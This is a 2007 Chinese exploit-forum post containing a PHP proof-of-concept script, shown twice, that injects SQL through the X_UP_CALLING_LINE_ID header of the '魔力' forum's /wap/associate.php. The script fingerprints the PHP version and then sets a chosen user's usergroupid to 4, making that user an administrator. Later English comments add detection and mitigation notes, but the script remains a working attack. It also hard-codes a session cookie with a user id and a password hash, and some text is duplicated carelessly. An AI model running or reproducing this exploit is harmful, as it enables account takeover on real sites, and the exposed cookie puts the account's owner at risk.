2007-04-06 17:22:13 by: h4x0r
For Exploit 魔力论坛
P.S:7j 那放出来滴.
不知道哪个鸟人在群里还在那叫唤
(魔力0day 魔力0day ...吼半天还是没人理他。可怜的人。)
不知道哪个鸟人在群里还在那叫唤
(魔力0day 魔力0day ...吼半天还是没人理他。可怜的人。)
<?php
// Driver of a proof-of-concept for a SQL injection in the forum's
// /wap/associate.php endpoint. The injected text travels in the
// X_UP_CALLING_LINE_ID request header, which send() fills from $evildata.
//
// Reviewer notes for defenders:
//  - Detection: requests to /wap/associate.php whose X_UP_CALLING_LINE_ID
//    header contains a quote, "usergroupid" or "/*"; also unexpected changes
//    to the usergroupid column. The fixed User-Agent below is a weak indicator.
//  - Mitigation: treat every request header as untrusted input and bind it as
//    a query parameter instead of concatenating it into SQL.
//  - The payload shape suggests the server places the header value inside a
//    quoted string of an UPDATE statement; the server code is not shown here,
//    so this is an inference to confirm against the application source.

// Banner printed at start-up.
print_r("
+------------------------------------------------------------------+
Exploit For 魔力
Just For Fun :)
+------------------------------------------------------------------+
");
// No execution time limit for this run.
ini_set("max_execution_time",0);
// 7 = E_ERROR | E_WARNING | E_PARSE, so notices (e.g. an unset $php[1]) stay silent.
error_reporting(7);
// Command-line arguments: argv[1] = host, argv[2] = path prefix, argv[3] = numeric user id.
$sitepath="$argv[2]";
$server="$argv[1]";
$id="$argv[3]";
// Hard-coded session cookie of an existing account (session id, user id and a
// 32-hex-character password value, presumably a hash). Publishing it exposes
// that account; the final die() message implies a logged-in session is required.
$cookie='redbbssessionid=5604730f9608848e; cnzz02=11; rtime=0; ltime=1168828899792; cnzz_eid=75851673-; redbbsuserid=52863; redbbspassword=5d0a98dc161ba9e55208f34e2b2ef473; redbbslanguage=zh-cn ';
$useragent='Opera/9.01 (Windows NT 5.1; U; zh-cn)';
// Version fingerprinting, step 1: read the X-Powered-By response header.
// $evildata is not assigned yet, so this request carries an empty header value.
preg_match('/X-Powered-By: php\/(.+)/ie',send("",'index.php'),$php);
if(!$php[1]) {
// Step 2 (fallback): request the PHP credits page and take the version from its heading.
// Both signals depend on expose_php; turning it off removes them.
$tmppath='index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000';
$resp=send('',"$tmppath");
preg_match('/\<th\>php (.+)Quality Assurance Team/i',$resp,$php);
}
echo "We Got php version:\t".$php[1]."";
// Continue only when the version string contains "5."; the pattern is
// unanchored, so it matches that text anywhere in the string.
if(preg_match('/(\s*)5\./i',$php[1])) echo "Maybe It is VUL";
else die("It is Not Vul Or Post The EviL Data By Your Self");
// SQL fragment: closes a quoted value, adds "usergroupid=4" with a WHERE clause
// on the chosen id, and comments out the rest of the statement. The success
// message below indicates the author regards group 4 as the administrator group.
$evildata="0',usergroupid=4 where id=$id/*";
$script='/wap/associate.php?do=1';
// The response is converted from UTF-8 to GBK before the success text is searched.
$resp=iconv('UTF-8','gbk',send('',$script));
// '操作成功完成' means "operation completed successfully".
if(strpos($resp,'操作成功完成')) echo "Expoilt Over! :) Id=$id May be Is Admin Now";
else die("Bad Luck! Are You Loggin? ");
/**
 * Sends one POST request to $server on port 80 and returns the raw response.
 *
 * All request state comes from globals: $sitepath, $server, $cookie,
 * $useragent and $evildata. The value of $evildata is placed in the
 * X_UP_CALLING_LINE_ID header, the field a defender should inspect in request logs.
 *
 * @param mixed  $cmd    Unused in this function.
 * @param string $script Path (and query string) appended to $sitepath.
 * @return string Response text wrapped between the markers "<-_->" and "</-_->";
 *                only the two markers when the connection could not be opened.
 */
function send($cmd,$script)
{
global $useragent,$sitepath,$server,$cookie,$evildata,$count;
$path =$sitepath.$script;
// Request counter; nothing in the visible code initialises or reads it.
$count=$count+1;
// Request line and header fields are concatenated into a single string.
$message = "POST ".$path." HTTP/1.1";
$message .= "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1";
$message .= "Accept-Language: zh-CN,zh;q=0.9,en;q=0.8";
$message .= "Referer: http://".$server.$path."";
$message .= "Content-Type: application/x-www-form-urlencoded";
$message .= "Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1";
$message .= "Host: ".$server."";
$message .= "User-Agent: ".$useragent."";
$message .= "Connection: Keep-Alive";
// Attacker-controlled header value; empty until the caller assigns $evildata.
$message .= "X_UP_CALLING_LINE_ID: ".$evildata."";
$message .= "Cookie: ".$cookie."";
$message .= "";
// Errors are suppressed with @, and the write below runs even when the
// connection failed ($fd is then false).
$fd = @fsockopen( $server, 80 );
@fputs($fd,$message);
$resp = "<-_->";
if($fd)
{
// Read in 1024-byte chunks until the peer closes the connection.
while(!@feof($fd)) {
$resp .= @fread($fd,1024);
}
}
@fclose($fd);
$resp .="</-_->";
return $resp;
}
?>
// Second copy of the proof-of-concept driver for a SQL injection in the forum's
// /wap/associate.php endpoint. The injected text travels in the
// X_UP_CALLING_LINE_ID request header, which send() fills from $evildata.
//
// Reviewer notes for defenders:
//  - Detection: requests to /wap/associate.php whose X_UP_CALLING_LINE_ID
//    header contains a quote, "usergroupid" or "/*"; also unexpected changes
//    to the usergroupid column.
//  - Mitigation: treat request headers as untrusted input and bind them as
//    query parameters instead of concatenating them into SQL.

// Banner printed at start-up.
print_r("
+------------------------------------------------------------------+
Exploit For 魔力
Just For Fun :)
+------------------------------------------------------------------+
");
// No execution time limit for this run.
ini_set("max_execution_time",0);
// 7 = E_ERROR | E_WARNING | E_PARSE, so notices stay silent.
error_reporting(7);
// Command-line arguments: argv[1] = host, argv[2] = path prefix, argv[3] = numeric user id.
$sitepath="$argv[2]";
$server="$argv[1]";
$id="$argv[3]";
// Hard-coded session cookie of an existing account; publishing it exposes that account.
$cookie='redbbssessionid=5604730f9608848e; cnzz02=11; rtime=0; ltime=1168828899792; cnzz_eid=75851673-; redbbsuserid=52863; redbbspassword=5d0a98dc161ba9e55208f34e2b2ef473; redbbslanguage=zh-cn ';
$useragent='Opera/9.01 (Windows NT 5.1; U; zh-cn)';
// Version fingerprinting, step 1: read the X-Powered-By response header.
preg_match('/X-Powered-By: php\/(.+)/ie',send("",'index.php'),$php);
if(!$php[1]) {
// Step 2 (fallback): take the version from the PHP credits page heading.
// Both signals depend on expose_php; turning it off removes them.
$tmppath='index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000';
$resp=send('',"$tmppath");
preg_match('/\<th\>php (.+)Quality Assurance Team/i',$resp,$php);
}
echo "We Got php version:\t".$php[1]."";
// Continue only when the version string contains "5." (unanchored pattern).
if(preg_match('/(\s*)5\./i',$php[1])) echo "Maybe It is VUL";
else die("It is Not Vul Or Post The EviL Data By Your Self");
// SQL fragment: closes a quoted value, adds "usergroupid=4" with a WHERE clause
// on the chosen id, and comments out the rest of the statement.
$evildata="0',usergroupid=4 where id=$id/*";
$script='/wap/associate.php?do=1';
// The response is converted from UTF-8 to GBK before the success text is searched.
$resp=iconv('UTF-8','gbk',send('',$script));
// '操作成功完成' means "operation completed successfully".
if(strpos($resp,'操作成功完成')) echo "Expoilt Over! :) Id=$id May be Is Admin Now";
else die("Bad Luck! Are You Loggin? ");
/**
 * Sends one POST request to $server on port 80 and returns the raw response.
 *
 * All request state comes from globals: $sitepath, $server, $cookie,
 * $useragent and $evildata. The value of $evildata is placed in the
 * X_UP_CALLING_LINE_ID header, the field a defender should inspect in request logs.
 *
 * @param mixed  $cmd    Unused in this function.
 * @param string $script Path (and query string) appended to $sitepath.
 * @return string Response text wrapped between the markers "<-_->" and "</-_->";
 *                only the two markers when the connection could not be opened.
 */
function send($cmd,$script)
{
global $useragent,$sitepath,$server,$cookie,$evildata,$count;
$path =$sitepath.$script;
// Request counter; nothing in the visible code initialises or reads it.
$count=$count+1;
// Request line and header fields are concatenated into a single string.
$message = "POST ".$path." HTTP/1.1";
$message .= "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1";
$message .= "Accept-Language: zh-CN,zh;q=0.9,en;q=0.8";
$message .= "Referer: http://".$server.$path."";
$message .= "Content-Type: application/x-www-form-urlencoded";
$message .= "Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1";
$message .= "Host: ".$server."";
$message .= "User-Agent: ".$useragent."";
$message .= "Connection: Keep-Alive";
// Attacker-controlled header value; empty until the caller assigns $evildata.
$message .= "X_UP_CALLING_LINE_ID: ".$evildata."";
$message .= "Cookie: ".$cookie."";
$message .= "";
// Errors are suppressed with @, and the write below runs even when the
// connection failed ($fd is then false).
$fd = @fsockopen( $server, 80 );
@fputs($fd,$message);
$resp = "<-_->";
if($fd)
{
// Read in 1024-byte chunks until the peer closes the connection.
while(!@feof($fd)) {
$resp .= @fread($fd,1024);
}
}
@fclose($fd);
$resp .="</-_->";
return $resp;
}
?>








